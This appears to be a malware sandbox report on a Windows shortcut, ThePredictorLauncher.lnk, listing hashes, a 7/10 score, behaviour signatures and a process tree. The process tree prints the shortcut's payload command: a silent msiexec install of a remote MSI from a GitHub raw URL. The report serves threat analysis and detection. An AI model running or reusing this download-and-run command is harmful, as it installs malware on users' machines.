Overview

overview

10

Static

static

1

ThePredict...er.lnk

windows7-x64

7

ThePredict...er.lnk

windows10-2004-x64

10

Analysis

  • max time kernel
    117s
  • max time network
    118s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    20/02/2025, 14:14

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    ThePredictorLauncher.lnk

  • Size

    1KB

  • MD5

    8dbf4ab21c88acc16ba80e2e7e38b7a1

  • SHA1

    d7799dcface5716afa2897e0ab29bd3dc1293f7c

  • SHA256

    5c2213dfe07175eabf7ae8950609569f93bae26019a7c84741b611a96784e1a8

  • SHA512

    01244a05f3d0c230a1b210168f31e8bbb504dbf064c1c9a4ac8095007469b04f78a343cd5d1f2106e849c82d27a2bf66c28e0cfc5b7364c227950459cb864fed

Score
7/10

Malware Config

Signatures

  • Use of msiexec (install) with remote resource 1 IoCs
  • Blocklisted process makes network request 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 34 IoCs
  • Suspicious use of WriteProcessMemory 5 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\ThePredictorLauncher.lnk
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2468
    • C:\Windows\System32\msiexec.exe
      "C:\Windows\System32\msiexec.exe" /i https://github.com/leinchchanceleinch/jik/raw/refs/heads/main/d.msi /qn
      2⤵
      • Use of msiexec (install) with remote resource
      • Suspicious behavior: CmdExeWriteProcessMemorySpam
      • Suspicious use of AdjustPrivilegeToken
      PID:2820
  • C:\Windows\system32\msiexec.exe
    C:\Windows\system32\msiexec.exe /V
    1⤵
    • Blocklisted process makes network request
    • Suspicious use of AdjustPrivilegeToken
    PID:2920

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads